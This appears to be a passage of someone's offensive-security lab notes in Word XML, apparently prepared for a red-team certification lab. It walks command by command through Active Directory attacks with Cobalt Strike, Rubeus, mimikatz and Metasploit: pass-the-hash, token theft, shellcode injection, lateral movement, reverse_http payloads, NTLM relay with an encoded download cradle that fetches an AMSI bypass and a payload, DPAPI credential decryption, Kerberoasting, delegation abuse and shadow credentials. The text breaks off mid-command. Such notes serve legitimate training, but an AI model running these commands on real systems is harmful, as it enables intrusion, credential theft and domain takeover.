    <w:p w:rsidR="003E3EB7" w:rsidRPr="003E3EB7" w:rsidRDefault="003E3EB7" w:rsidP="003E3E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OverPassTheHash (OPTH)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rc4 NTLM Hash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/user:jking /ntlm:59fc0f884922b4ce376051134c71e22c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aes256 hash for better opsec, along with /domain (Use NetBios name "DEV" not FQDN "dev.cyberbotic.io") and /opsec flags (better opsec)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/user:jking /aes256:4a8a74daad837ae09e9ecc8c2f1b89f960188cb934db6d4bbebade8318ae57c6 /domain:DEV /opsec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username and password to obtain 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We can use Rubeus Hash Functionality to calculate hash from the credentials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Calculate Hash of the random password, So we can use it to get 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cmd&gt; C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe hash /password:oIrpupAtF1YCXaw /user:EvilComputer$ /domain:dev.cyberbotic.io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Alternatively we can use make_token in Cobalt Strike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/user:jking /password:&lt;password&gt; /enctype:&lt;des|aes128|aes256|rc4(default)&gt; /domain:DEV /opsec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/user:mssql_svc /password:Cyberb0tic /enctype:rc4 /domain:DEV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/user:EvilComputer$ /aes256:7A79D...44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using this TGT perform PTT attack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/domain:dev.cyberbotic.io /username:bfarmer /password:FakePass123 /ticket:doIFuj[...snip...]lDLklP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4748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token-store steal 4748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we can check for LocalAdminAccess and then Move Laterally.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Find-LocalAdminAccess -Verbose</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003E3EB7" w:rsidRPr="003E3EB7" w:rsidRDefault="003E3EB7" w:rsidP="003E3E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Token Impersonation , Token Store, Make Token &amp; Process Injection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steal access token from another process using steal_token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&lt;PID&gt;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Drop the impersonation (Revert to ourself)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rev2self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Storing and managing stolen access tokens using token-store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Steal a token from a Process and add it to token store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token-store steal 5536</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List all stored tokens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token-store show</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Impersonating a Stored Token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token-store use &lt;id&gt;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Drop the impersonation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rev2self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Removing a Single Token or Flushing all tokens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token-store remove &lt;id&gt;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token-store remove-all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Impersonating Domain User with Credentials using make_token (make_token = runas /netonly)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 logon session created with LogonUserA API (make_token) has the same local identifier as the caller but the alternate credentials are used when accessing a remote resource.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make_token DEV\jking &lt;Password&gt;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Process Injection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`shinject` allows you to inject any arbitrary shellcode from a binary file on your attacking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shinject &lt;PID&gt; &lt;x86|x64&gt; /path/to/binary.bin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will inject a full Beacon payload for the specified listener.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inject 4464 x64 tcp-local</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Lateral Movement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Jump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This will spawn a Beacon payload on the remote target, and if using a P2P listener, will connect to it automatically.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Malleable C2 amsi_disable does not applies to Cobalt Strike Jump Command, So some methods in jump command which uses Powershell like psexec_psh , winrm and winrm64 will not work if payload is detected, So we musty have to use Custom AMSI Bypass script to avoif that and get a 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make the jump command work and include amsi bypass into it, We need to modify the Resource kit's template.x86.ps1 (for winrm), template.x64.ps1 (for winrm64) and compress.ps1 (for psexec_psh).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learn more , Read this blog - https://offensivedefence.co.uk/posts/making-amsi-jump/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jump psexec/psexec64/psexec_psh/winrm/winrm64 ComputerName beacon_listener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Using remote exec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You also need to connect to P2P Beacons manually using connect or link.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psexec/winrm/wmi ComputerName &lt;uploaded binary on remote system&gt;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execute commands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winrm ComputerName &lt;execute commands&gt;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PSExec (Requires TGS for CIFS)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Make sure to change the Post-Ex process for Psexec which is Rundll32.exe by default and even Malleable c2's Post-Ex don't help here , So we have to do it manually using spawnto.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ak-settings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spawnto x64 %windir%\sysnative\dllhost.exe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spawnto x86 %windir%\syswrun klist ow64\dllhost.exe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jump psexec64 web.dev.cyberbotic.io smb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jump psexec_psh web.dev.cyberbotic.io smb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\\web.dev.cyberbotic.io\ADMIN$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psexec web.dev.cyberbotic.io C:\Windows\smb_x64.exe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psexec sql-2 powershell.exe -nop -w hidden -c 'C:\Windows\smb_x64.exe'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web.dev.cyberbotic.io TSVCPIPE-81180acb-0512-44d7-81fd-fbfea25fff10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Then use powerpick to get its own process name, it will return dllhost.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Get-Process -Id $pid | select ProcessName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Example Windows Remote Management (WinRM) - (Requires TGS for HOST &amp; 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\\web.dev.cyberbotic.io\c$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jump winrm64 web.dev.cyberbotic.io smb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jump winrm web.dev.cyberbotic.io smb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\\web.dev.cyberbotic.io\c$\ProgramData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winrm web.dev.cyberbotic.io C:\Windows\smb_x64.exe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winrm sql-2 powershell.exe -nop -w hidden -c 'C:\Windows\smb_x64.exe'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web.dev.cyberbotic.io TSVCPIPE-81180acb-0512-44d7-81fd-fbfea25fff1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Example Windows Management Instrumentation (WMI) - (Requires TGS for HOST &amp; RPCSS)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gets COM Error try to upload the binary to directory where user may have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\\web.dev.cyberbotic.io\c$\ProgramData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wmi web.dev.cyberbotic.io C:\Windows\smb_x64.exe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remote-exec wmi sql-2 powershell.exe -nop -w hidden -c 'C:\Windows\smb_x64.exe'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web.dev.cyberbotic.io TSVCPIPE-81180acb-0512-44d7-81fd-fbfea25fff10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SharpWMI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c:\Tools\Ghostpack-CompiledBinaries\SharpWMI.exe action=exec computername=web.dev.cyberbotic.io command="C:\Windows\smb_beacon2.exe"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WINTERFELL msagent_eb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Executing .Net binary remotely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Some of Seatbelt's commands can also be run remotely, which can be useful enumerating its configurations and defences before jumping to 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OSInfo -ComputerName=web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Invoke DCOM (better opsec) (Requires TGS for RPCSS)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C:\Tools\Invoke-DCOM.ps1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\\web.dev.cyberbotic.io\ADMIN$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Invoke-DCOM -ComputerName web.dev.cyberbotic.io -Method MMC20.Application -Command C:\Windows\smb_x64.exe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web.dev.cyberbotic.io agent_vinod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While using remote-exec for lateral movement, kindly generate the windows service binary as psexec creates a windows service pointing to uploaded binary for execution</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Session Passing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 1: Beacon Passing (Within Cobalt Strike - Create alternate HTTP beacon while keeping DNS as lifeline)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 x64 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 2: Foreign Listener (From CS to Metasploit - Staged Payload - only x86 payloads)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Setup Metasploit listener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attacker@ubuntu ~&gt; sudo msfconsole -q</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&gt; use exploit/multi/handler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exploit(multi/handler) &gt; set payload windows/meterpreter/reverse_http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exploit(multi/handler) &gt; set LHOST ens5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exploit(multi/handler) &gt; set LPORT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exploit(multi/handler) &gt; run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Setup a Foreign Listener in cobalt strike with above IP &amp; port details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Jump psexec to execute the beacon payload and pass the session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jump psexec Foreign_listener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spawn x86 Foreign_listener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 3: Shellcode Injection (From CS to Metasploit - Stageless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Setup up metasploit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&gt; use exploit/multi/handler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exploit(multi/handler) &gt; set payload windows/x64/meterpreter_reverse_http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msf6 exploit(multi/handler) &gt; exploit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Generate binary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ubuntu@DESKTOP-3BSK7NO ~&gt; msfvenom -p windows/x64/meterpreter_reverse_http LHOST=10.10.5.50 LPORT=8080 -f raw -o /mnt/c/Payloads/msf_http_x64.bin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msf shellcode into process memory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shspawn x64 C:\Payloads\msf_http_x64.bin</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Pivoting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Enable Socks Proxy in beacon session (Use SOCKS 5 for better OPSEC)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1080 socks5 disableNoAuth socks_user socks_password enableLogging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1080 socks4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stop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the SOCKS proxy on team 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attacker@ubuntu ~&gt; sudo ss -lpnt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Configure Proxychains in Linux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nano /etc/proxychains.conf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socks5 127.0.0.1 1080 socks_user socks_password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$attacker@ubuntu ~&gt; proxychains nmap -n -Pn -sT -p445,3389,4444,5985 10.10.122.10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$attacker@ubuntu ~ &gt; proxychains wmiexec.py DEV/jking@10.10.122.30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Tunnel Metasploit Framework exploits and modules through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6666 socks4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msf&gt; setg Proxies socks4:TeamServerIP:Port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msf&gt; setg ReverseAllowProxy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msf&gt; unsetg Proxies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Use Proxifier for Windows environment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runas /netonly /user:dev/bfarmer mmc.exe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mimikatz &gt; privilege::debug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mimikatz &gt; sekurlsa::pth /domain:DEV /user:bfarmer /ntlm:4ea24377a53e67e78b2bd853974420fc /run:mmc.exe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$cred = Get-Credential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Get-ADComputer -Server 10.10.122.10 -Filter * -Credential $cred | select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FoxyProxy plugin to access Webportal via SOCKS Proxy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Reverse Port Forward (if teamserver is not directly accessible, then use rportfwd to redirect traffic)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8080 127.0.0.1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stop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netstat -anp tcp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New-NetFirewallRule -DisplayName "Test Rule" -Profile Domain -Direction Inbound -Action Allow -Protocol TCP -LocalPort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iwr -Uri http://wkstn-2:8080/a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Remove-NetFirewallRule -DisplayName "Test Rule"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NTLM Relay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Allow ports inbound on the Windows firewall (One for SMB and one for Powershell cradle).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powershell New-NetFirewallRule -DisplayName "8445-In" -Direction Inbound -Protocol TCP -Action Allow -LocalPort 8445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New-NetFirewallRule -DisplayName "8080-In" -Direction Inbound -Protocol TCP -Action Allow -LocalPort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Setup reverse port forwarding - one for the SMB capture, the other for a PowerShell download cradle.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8080 127.0.0.1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8445 127.0.0.1 445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Setup SOCKS Proxy on the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1080 socks5 disableNoAuth socks_user socks_password enableLogging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Setup Proxychains to use this proxy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nano /etc/proxychains.conf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socks5 127.0.0.1 1080 socks_user socks_password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Use Proxychain to send NTLMRelay traffic to beacon targeting DC and encoded SMB Payload for execution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proxychains ntlmrelayx.py -t smb://10.10.122.10 -smb2support --no-http-server --no-wcf-server -c 'powershell -nop -w hidden -enc SQBFAFgAIAAoAG4AZQB3AC0AbwBiAGoAZQBjAHQAIABuAGUAdAAuAHcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AdwBrAHMAdABuAC0AMgA6ADgAMAA4ADAALwBhAG0AcwBpAC0AYgB5AHAAYQBzAHMALgBwAHMAMQAiACkAOwBpAGUAeAAgACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACIAaAB0AHQAcAA6AC8ALwB3AGsAcwB0AG4ALQAyADoAOAAwADgAMAAvAGIAIgApA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IEX (new-object net.webclient).downloadstring("http://wkstn-2:8080/amsi-bypass.ps1");iex (new-object net.webclient).downloadstring("http://wkstn-2:8080/b")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Where is the wkstn-2 IP.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10.10.122.10 is the IP address of dc-2.dev.cyberbotic.io, which is our target.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 encoded command is a download cradle pointing at http://10.10.123.102:8080/b, and /b is an SMB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Upload PortBender driver and load its .cna file (Cobalt Strike &gt; Script Manager and load PortBender.cna from C:\Tools\PortBender)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C:\Windows\system32\drivers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C:\Tools\PortBender\WinDivert64.sys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PortBender redirect 445 8445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7. Manually try to access share on our system or use MSPRN, Printspooler to force authentication (Refer to Notes)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Manually triggering the attack (Usin a console of Wkstn-1 as nlamb user to make authentication attempt on wkstn-2.)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C:\Users\nlamb&gt;hostname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wkstn-1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C:\Users\nlamb&gt;dir \\10.10.123.102\relayme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C:\Users\nlamb&gt;dir \\wkstn-2\relayme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8. Verify the access in weblog and use link command to connect with SMB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dc-2.dev.cyberbotic.io TSVCPIPE-81180acb-0512-44d7-81fd-fbfea25fff10</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lastRenderedPageBreak/>
        <w:t>Data Protection API (DPAPI)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mimikatz to dump secrets from windows vault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!vault::list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!vault::cred /patch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Part 1: Enumerate stored credentials, Make sure to enumerate as both Admin and Domain User in a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0. Check if system has credentials stored in either web or windows vault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vaultcmd /list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vaultcmd /listcreds:"Windows Credentials" /all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vaultcmd /listcreds:"Web Credentials" /all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WindowsVault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Part 2.1: Scheduled Task Credentials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0. Before manually trying to extract Credentials try below command ones which is equivalent of the below commands and gives same.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!vault::cred /patch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Credentials for task scheduler are stored at below location in encrypted blob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C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Credentials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Find the GUID (guidMasterKey) of Master key associated with encrypted blob (F31...B6E)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dpapi::cred /in:C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Credentials\F3190EBE0498B77B4A85ECBABCA19B6E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Dump all the master keys and filter the one we need based on GUID identified in previous step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!sekurlsa::dpapi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Use the Encrypted Blob and Master Key to decrypt and extract plain text password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dpapi::cred /in:C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Credentials\F3190EBE0498B77B4A85ECBABCA19B6E /masterkey:10530dda04093232087d35345bfbb4b75db7382ed6db73806f86238f6c3527d830f67210199579f86b0c0f039cd9a55b16b4ac0a3f411edfacc593a541f8d0d9</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Part 2.2: Extracting stored RDP Password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0. Verify if any credentials are stored or not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vaultcmd /list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vaultcmd /listcreds:"Windows Credentials" /all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vaultcmd /listcreds:"Web Credentials" /all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WindowsVault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Enumerate the location of encrypted credentials blob (Returns ID of Enc blob and GUID of Master Key)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WindowsCredentialFiles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Verify the credential blob in users cred directory (Note enc blob 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C:\Users\bfarmer\AppData\Local\Microsoft\Credentials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3. Master keys are stored in the users' roaming "Protect" directory (Note GUID of master key matching with Seatbelt)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C:\Users\bfarmer\AppData\Roaming\Microsoft\Protect\S-1-5-21-569305411-121244042-2357301523-1104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Decrypt the master key first to obtain the actual AES128/256 encryption key, and then use that key to decrypt the credential blob. (Need to be execute in context of user who owns the key, use @ modifier)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Requires Elevation or interaction with LSASS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!sekurlsa::dpapi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Does not requires elevation or interaction with LSASS (Check last lines with "domainkey with RPC" line)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dpapi::masterkey /in:C:\Users\bfarmer\AppData\Roaming\Microsoft\Protect\S-1-5-21-569305411-121244042-2357301523-1104\bfc5090d-22fe-4058-8953-47f6882f549e /rpc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Use Master key to decrypt the credentials blob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dpapi::cred /in:C:\Users\bfarmer\AppData\Local\Microsoft\Credentials\6C33AC85D0C4DCEAB186B3B2E5B1AC7C /masterkey:8d15395a4bd40a61d5eb6e526c552f598a398d530ecc2f5387e07605eeab6e3b4ab440d85fc8c4368e0a7ee130761dc407a2c4d58fcd3bd3881fa4371f19c214</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Kerberos</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003E3EB7" w:rsidRPr="003E3EB7" w:rsidRDefault="003E3EB7" w:rsidP="003E3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Kerberoasting / ASREPRoasting</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Kerberosting</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"(&amp;(objectCategory=user)(servicePrincipalName=*))" --attributes cn,servicePrincipalName,samAccountName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avoid Honeypot accounts, few enumerations can be performed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-Identity mssql_svc,squid_svc,honey_svc | select samaccountname,logoncount,badpasswordtime,lastlogontimestamp,lastlogoff,lastlogon,badpwdcount,whencreated,pwdlastset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kerberoast /user:mssql_svc,squid_svc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hashcat -a 3 -m 13100 hashes wordlist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 experienced some hash format incompatibility with john.  Removing the SPN so it became: $krb5tgs$23$*mssql_svc$dev.cyberbotic.io*$6A9E[blah] seemed to address the issue.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john --format=krb5tgs --wordlist=wordlist mssql_svc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ASREPRoast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"(&amp;(objectCategory=user)(userAccountControl:1.2.840.113556.1.4.803:=4194304))" --attributes cn,distinguishedname,samaccountname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avoid Honeypot accounts, few enumerations can be performed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Get-DomainUser -Identity mssql_svc,squid_svc,honey_svc | select samaccountname,logoncount,badpasswordtime,lastlogontimestamp,lastlogoff,lastlogon,badpwdcount,whencreated,pwdlastset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asreproast /user:squid_svc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hashcat -a 3 -m 18200 svc_oracle wordlist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john --format=krb5asrep --wordlist=wordlist squid_svc</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003E3EB7" w:rsidRPr="003E3EB7" w:rsidRDefault="003E3EB7" w:rsidP="003E3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Unconstrained Delegation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Unconstrained Delegation (Caches TGT of any user accessing its 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Identify the computer objects having Unconstrained Delegation enabled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"(&amp;(objectCategory=computer)(userAccountControl:1.2.840.113556.1.4.803:=524288))" --attributes samaccountname,dnshostname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Dumping the cached TGT ticket (requires system access on affected system)</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getuid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triage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dump /luid:0x14794e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monitor /interval:10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3. Execute PrintSpool attack to force DC to authenticate with WEB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C:\Tools\SharpSystemTriggers\SharpSpoolTrigger\bin\Release\SharpSpoolTrigger.exe dc-2.dev.cyberbotic.io web.dev.cyberbotic.io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(a). For MACHINE TGT : Use Machine TGT (DC) fetched to gain RCE on itself using S4U abuse (/self flag)</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A machine account TGT ticket if injected will not work probably, So we have to  abuse S4U2SELF to obtain TGS and get access as Local Admin to that machine.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this by injecting the TGT insto a sacrificial process and try to access the files. Check S4U2Self Notes below.</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Generate TGS from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/impersonateuser:nlamb /self /altservice:cifs/dc-2.dev.cyberbotic.io /user:dc-2$ /nowrap /ticket:doIFuj[...]lDLklP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TGS in a sacrificial process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ls \\dc-2.dev.cyberbotic.io\c$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(b). For DOMAIN USER TGT : Inject the ticket and access the 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Constrained Delegation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Constrained Delegation (allows to request TGS for any user using its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Identify the computer/User objects having Constrained Delegation is enabled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"(&amp;(objectCategory=computer)(msds-allowedtodelegateto=*))" --attributes dnshostname,samaccountname,msds-allowedtodelegateto --json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"(&amp;(objectCategory=user)(msds-allowedtodelegateto=*))" --attributes dnshostname,samaccountname,msds-allowedtodelegateto --json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(a). Dump the TGT of User/Computer Account having constrained Delegation enabled (use asktgt or NTLM hash)</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getuid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triage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dump /luid:0x3e7 /service:krbtgt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(b). Using Machine/User NTLM Hash to generate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!sekurlsa::logonpasswords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/user:sql-2$ /rc4:49d47d3af2329a410e6510a7ccd535c3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(a). Use S4U technique to request TGS for delegated service using machines TGT (Use S4U2Proxy tkt)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/impersonateuser - Impersonating Domain Admin , So check the domain admins and use that. (in lab - nlamb, Administrator)</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"Domain Admins" -Domain dev.cyberbotic.io -Recurse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/impersonateuser:nlamb /msdsspn:CIFS/dc-2.dev.cyberbotic.io /user:sql-2$ /nowrap /ticket:doIFLD[...snip...]MuSU8=</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(b). OR, Access other alternate Service not stated in Delegation attribute (ldap, http, host, etc...)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C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe s4u /impersonateuser:nlamb /msdsspn:CIFS/dc-2.dev.cyberbotic.io /altservice:LDAP /nowrap /user:sql-2$ /ticket:doIFpD[...]MuSU8=</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STEP 2 &amp; 3 in one command using Credentials (Getting TGT and from TGT requesting TGS for Alternative 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/user:SQL-2$ /rc4:49d47d3af2329a410e6510a7ccd535c3 /impersonateuser:nlamb /msdsspn:CIFS/dc-2.dev.cyberbotic.io /altservice:LDAP /domain:dev.cyberbotic.io /dc:dc-2.dev.cyberbotic.io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Inject the TGS from previous step (In attacker machine or Initial Machine)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/ticket:doIGaD[...]ljLmlv</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5. Access the services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5540</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dcsync dev.cyberbotic.io DEV\krbtgt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Directory Listing \\dc-2.dev.cyberbotic.io\c$ worked when impersonating 'nlamb' Domain Admin , But not worked with 'Administrator' Domain Admin in the CRTO Lab Environment.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003E3EB7" w:rsidRPr="003E3EB7" w:rsidRDefault="003E3EB7" w:rsidP="003E3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S4U2Self Abuse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S4U2Self Abuse can be Used to get TGS from TGT of a Machine Account.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A machine account TGT ticket if injected will not work probably, So we have to  abuse S4U2SELF to obtain TGS and get access as Local Admin to that machine.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Generate TGS from TGT or (TGT, RC4 or AES hash of machine account)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the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Credentials or Dump it from machine or use PrintSpool attack (force DC to authenticate with WEB machine with unconstrained Delegation Enabled)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/user:Administrator /rc4:c04d18e6ff38ae05ed3747274c82b07e /domain:dev.cyberbotic.io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!sekurlsa::tickets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triage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dump /luid:0x14794e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monitor /interval:10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C:\Tools\SharpSystemTriggers\SharpSpoolTrigger\bin\Release\SharpSpoolTrigger.exe dc-2.dev.cyberbotic.io web.dev.cyberbotic.io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the TGT into a sacrificial Process and then try to access the machine share. You will get the error.</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/ticket:&lt;TGT-TICKET&gt;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7656</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klist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Perform the S4U2Self Abuse to get the TGS from the injected TGT in the sacrificial process and use rubeus /ptt to directly pass the ticket to the sacrificial process. (Run it within Sacrificial Process)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/user:dc-2$ /impersonateuser:Administrator /altservice:cifs/dc-2.dev.cyberbotic.io /self /nowrap /ptt /ticket:&lt;TGT-TICKET&gt;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klist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RBCD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Resource-Based Constrained Delegation (Systems having writable msDS-AllowedToActOnBehalfOfOtherIdentity)</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RBCD can be configured to both Domain Machines objects and Domain User Objects, So enumerate both.</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CASE-1 : Have Local Admin Access to any Domain Joined Machine.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 Identify the Computer Objects which has AllowedToActOnBehalfOfOtherIdentity attribute defined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"(&amp;(objectCategory=computer)(msDS-AllowedToActOnBehalfOfOtherIdentity=*))" --attributes dnshostname,samaccountname,msDS-AllowedToActOnBehalfOfOtherIdentity --json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"(&amp;(objectCategory=user)(msDS-AllowedToActOnBehalfOfOtherIdentity=*))" --attributes dnshostname,samaccountname,msDS-AllowedToActOnBehalfOfOtherIdentity --json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#2. OR, Identify the Domain Computer where we have WriteProperty, GenericAll, GenericWrite or WriteDacl and can write this atribute with custom value.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 -Domain dev.cyberbotic.io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 Get-DomainObjectAcl -ResolveGUIDs | ? { $_.ActiveDirectoryRights -match "WriteProperty|GenericWrite|GenericAll|WriteDacl"}</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Get-DomainComputer | Get-DomainObjectAcl -ResolveGUIDs | ? { $_.ActiveDirectoryRights -match "WriteProperty|GenericWrite|GenericAll|WriteDacl" -and $_.SecurityIdentifier -match "S-1-5-21-569305411-121244042-2357301523-[\d]{4,10}"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 Get-DomainObjectAcl -ResolveGUIDs | ? { $_.ActiveDirectoryRights -match "WriteProperty|GenericWrite|GenericAll|WriteDacl" -and $_.SecurityIdentifier -match "S-1-5-21-569305411-121244042-2357301523-[\d]{4,10}"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ConvertFrom-SID S-1-5-21-569305411-121244042-2357301523-1107</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"Developers" -Domain dev.cyberbotic.io -Recurse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#3. Set the delegation attribute to a Computer Account where we have local admin access by modifying the attribute of target system</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we do not have Local Admin Access to any computer and only have User access then we can create Computer Object and Use it to abuse RBCD. Check Case-2.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wkstn-2 -Properties objectSid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$rsd = New-Object Security.AccessControl.RawSecurityDescriptor "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-569305411-121244042-2357301523-1109)"; $rsdb = New-Object byte[] ($rsd.BinaryLength); $rsd.GetBinaryForm($rsdb, 0); Get-DomainComputer -Identity "dc-2" | Set-DomainObject -Set @{'msDS-AllowedToActOnBehalfOfOtherIdentity' = $rsdb} -Verbose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#4. Verify the updated attribute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"dc-2" -Properties msDS-AllowedToActOnBehalfOfOtherIdentity</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#5. Get the TGT of our computer</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triage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dump /luid:0x3e4 /service:krbtgt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#6. Use S4U technique to get TGS for target computer using our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/user:WKSTN-2$ /impersonateuser:nlamb /msdsspn:cifs/dc-2.dev.cyberbotic.io /ticket:doIFuD[...]5JTw==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#7. Access the services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/ticket:doIGcD[...]MuaW8=</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4092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ls \\dc-2.dev.cyberbotic.io\c$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#8. Remove the delegation rights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dc-2 | Set-DomainObject -Clear msDS-AllowedToActOnBehalfOfOtherIdentity</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CASE-2 : Have Access to a Domain User but not Local Admin on Domain Joined Machine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Fake computer Account for RBCD Attack</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 Check if we have permission to create computer account (default allowed)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Get-DomainObject -Identity "DC=dev,DC=cyberbotic,DC=io" -Properties ms-DS-MachineAccountQuota</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#2. Create a fake computer with random password and then generate password hash using Rubeus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You wants to create a new computer object for a different Forest using StandIn Tool, Then Read this blog by Rasta - https://rastamouse.me/getdomain-vs-getcomputerdomain-vs-getcurrentdomain/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StandIn code needs to be modified if you wants to create a Computer in another Domain using --Domain parameter. (https://github.com/FuzzySecurity/StandIn/pull/17)</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execute-assembly C:\Tools\StandIn\StandIn\StandIn\bin\Release\StandIn.exe --computer EvilComputer --make --Domain dev.cyberbotic.io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C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe hash /password:oIrpupAtF1YCXaw /user:EvilComputer$ /domain:dev.cyberbotic.io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#3. Use the Hash to get TGT for our fake computer, and rest of the steps remains same, Follow case-1</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/user:EvilComputer$ /aes256:7A79DCC14E6508DA9536CD949D857B54AE4E119162A865C40B3FFD46059F7044 /nowrap</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003E3EB7" w:rsidRPr="003E3EB7" w:rsidRDefault="003E3EB7" w:rsidP="003E3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Shadow Credentials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Shadow Credentials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 Enumerate the Permissions GenericWrite/GenericAll to modify the attribute msDS-KeyCredentialLink for User or Computer Object.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Find-InterestingDomainAcl -ResolveGUIDs | ?{$_.IdentityReferenceName -match "Domain Users"}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 -Domain dev.cyberbotic.io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 Get-DomainObjectAcl -ResolveGUIDs | ? { $_.ActiveDirectoryRights -match "WriteProperty|GenericWrite|GenericAll|WriteDacl"}</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 Get-DomainObjectAcl -ResolveGUIDs | ? { $_.ActiveDirectoryRights -match "WriteProperty|GenericWrite|GenericAll|WriteDacl" -and $_.SecurityIdentifier -match "S-1-5-21-569305411-121244042-2357301523-[\d]{4,10}"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 Get-DomainObjectAcl -ResolveGUIDs | ? { $_.ActiveDirectoryRights -match "WriteProperty|GenericWrite|GenericAll|WriteDacl"}</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 Get-DomainObjectAcl -ResolveGUIDs | ? { $_.ActiveDirectoryRights -match "WriteProperty|GenericWrite|GenericAll|WriteDacl" -and $_.SecurityIdentifier -match "S-1-5-21-569305411-121244042-2357301523-[\d]{4,10}"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ConvertFrom-SID S-1-5-21-569305411-121244042-2357301523-1107</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"Developers" -Domain dev.cyberbotic.io -Recurse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#2-a. List any keys that might already be present for a target - this is important for when we want to clean up later. (Add $ for computer objects in /target)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C:\Tools\Whisker\Whisker\bin\Release\Whisker.exe list /target:dc-2$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#2-b. Enumerate for Users or Computers which might already be configured for Using Shadow Credentials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"(&amp;(objectCategory=computer)(msDS-KeyCredentialLink=*))" --attributes dnshostname,samaccountname,msDS-AllowedToActOnBehalfOfOtherIdentity --json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"(&amp;(objectCategory=user)(msDS-KeyCredentialLink=*))" --attributes dnshostname,samaccountname,msDS-AllowedToActOnBehalfOfOtherIdentity --json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#3. Then, Add a new key pair to the target. (Note the DeviceID GUID added. So we can remove later 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C:\Tools\Whisker\Whisker\bin\Release\Whisker.exe add /target:dc-2$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#4. Check if Shadow Credential is added.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Whisker</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C:\Tools\Whisker\Whisker\bin\Release\Whisker.exe list /target:dc-2$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PowerView</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-Identity supportXuser</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dc-2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#5. And now, we can ask for a TGT leveraging the certificate and using the Rubeus command that Whisker provides.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/user:dc-2$ /certificate:MIIJuA[...snip...]ICB9A= /password:"y52EhYqlfgnYPuRb"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#6-a. For machine account TGT , we can perform S4U2Self Abuse and get a TGS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Generate TGS from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/impersonateuser:nlamb /self /altservice:cifs/dc-2.dev.cyberbotic.io /user:dc-2$ /nowrap /ticket:doIFuj[...]lDLklP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TGS in a sacrificial process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#6-b. For a User Account TGT, We can just inject it by creating a sacrificial Process.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#7. Now we can clean Up , Whisker's clear command will remove any and all keys from msDS-KeyCredentialLink.</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#List all the entries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C:\Tools\Whisker\Whisker\bin\Release\Whisker.exe list /target:dc-2$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#Remove specific entries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C:\Tools\Whisker\Whisker\bin\Release\Whisker.exe remove /target:dc-2$ /deviceid:58d0ccec-1f8c-4c7a-8f7e-eb77bc9be403</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003E3EB7" w:rsidRPr="003E3EB7" w:rsidRDefault="003E3EB7" w:rsidP="003E3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Kerberos Relay Attacks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Kerberos Relay Attack (To Get Local Privilege Escalation from User to System)</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Configuring Cobalt Strike for Kerberos Relay Attack</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1.1 - Krbrelay uses BouncyCastle Crypto package , Which is quite large , its size is larger than the default task size allowed for beacon. Trying to run it with `execute-assembly` will throw an error.</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C:\Tools\KrbRelay\KrbRelay\bin\Release\KrbRelay.exe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Task size of 1727291 bytes is over the max task size limit of 1048576 bytes.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1.2 - To fix it we have to modify the Malleable C2 profile and double the task size tasks_max_size. Add below line to the top of your malleable C2 profile.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set tasks_max_size "2097152";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After updating the C2 Profile reload the teamserver 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daemon-reload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status teamserver.service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stop teamserver.service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start teamserver.service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systemctl enable teamserver.service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Using Kerberos Relay Attack with RBCD Abuse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For help Check Notes : https://gist.github.com/tothi/bf6c59d6de5d0c9710f23dae5750c4b9</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2.1 - To abuse RBCD we must have Local System access to a Domain Computer, Same as RBCD abuse we can just create a new Computer Object and use it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a Computer object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C:\Tools\StandIn\StandIn\StandIn\bin\Release\StandIn.exe --computer EvilComputer --make --domain dev.cyberbotic.io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its SID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EvilComputer -Properties objectsid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2.2 - Using Checkport, find a suitable port for the OXID resolver to circumvent a check in the (RPCSS).</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C:\Tools\KrbRelay\CheckPort\bin\Release\CheckPort.exe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2.3 - Run KrbRelay at that port (Using -rbcd argument)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C:\Tools\KrbRelay\KrbRelay\bin\Release\KrbRelay.exe -spn ldap/dc-2.dev.cyberbotic.io -clsid 90f18417-f0f1-484e-9d3c-59dceee5dbd8 -rbcd S-1-5-21-569305411-121244042-2357301523-9101 -port 10</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2.4 - Now, If we query  WKSTN-2$, we'll see that there's now an entry in in its  *msDS-AllowedToActOnBehalfOfOtherIdentity*  attribute.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wkstn-2 -Properties msDS-AllowedToActOnBehalfOfOtherIdentity</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2.5 - We have new added comp credentials So we can request a TGT and perform an S4U to obtain a usable service tickets (TGS) for WKSTN-2.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Machine Password to get the hash</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C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe hash /password:oIrpupAtF1YCXaw /user:EvilComputer$ /domain:dev.cyberbotic.io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Using hash to get the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/user:EvilComputer$ /aes256:1DE19DC9065CFB29D6F3E034465C56D1AEC3693DB248F04335A98E129281177A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S4U technique to get TGS for target computer using our TGT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we do not use the FQDN of the target machine in the msdsspn parameter, We used host/wkstn-2.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/user:EvilComputer$ /impersonateuser:Administrator /msdsspn:host/wkstn-2 /ticket:doIF8j[...snip...]MuaW8= /ptt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2.6 - To perform the elevation, use this TGS to interact with the local Service Control Manager over Kerberos to create and start a service binary payload.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Use BOF and Aggressor Script that registers a new  elevate command in Beacon.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C:\Tools\SCMUACBypass and is based on James' SCMUACBypass [](https://gist.github.com/tyranid/c24cfd1bd141d14d4925043ee7e03c82)gist.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elevate svc-exe-krb tcp-local</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Using Kerberos Relay Attack with Shadow Credential Abuse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 advantage of using shadow credentials over RBCD is that we don't need to add a fake computer to the domain.</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3.1 - Verify that WKSTN-2 (Target Machine) has nothing in its  msDS-KeyCredentialLink attribute.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C:\Tools\Whisker\Whisker\bin\Release\Whisker.exe list /target:wkstn-2$</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3.2 - Run KrbRelay as before (in Kerberos Relay with RBCD above), but this time   with the  -shadowcred parameter.</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gets error like  (0x800706D3): The authentication service is unknown. then reboot the machine</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C:\Tools\KrbRelay\KrbRelay\bin\Release\KrbRelay.exe -spn 